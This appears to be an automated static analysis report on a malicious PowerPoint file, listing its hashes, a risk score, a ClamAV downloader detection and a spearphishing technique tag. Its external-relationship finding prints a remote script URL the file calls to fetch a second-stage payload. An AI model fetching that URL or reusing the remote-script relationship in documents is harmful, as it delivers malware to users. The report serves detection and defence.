Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0e8cea4dfae048d9…

MALICIOUS

Office (OOXML)

133.6 KB Created: 2017-10-23 00:57:05 UTC Authoring application: Microsoft Office PowerPoint 14.0000 First seen: 2018-03-04
MD5: 4d85904b15c0adc8664f71bc2c5496bf SHA-1: f030301ffb06c8a5a827c6b9b3c87b0ce3448466 SHA-256: 0e8cea4dfae048d90fb023144b1692837aaab6e3e51ee1a9e6b8f302fe470d53
80 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The critical ClamAV heuristic and the medium OOXML_EXTERNAL_REL heuristic indicate that this Office document contains an external relationship pointing to a remote script. This suggests the document is designed to download and execute a second-stage payload from the specified URL, likely as part of a phishing campaign.

Heuristics 2

  • ClamAV: Doc.Downloader.PPTRemoteScript-6838713-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.PPTRemoteScript-6838713-0
  • External relationship medium OOXML_EXTERNAL_REL
    External target in ppt/slides/_rels/slide1.xml.rels: script:http:\\commail.co:5453\qqqzqa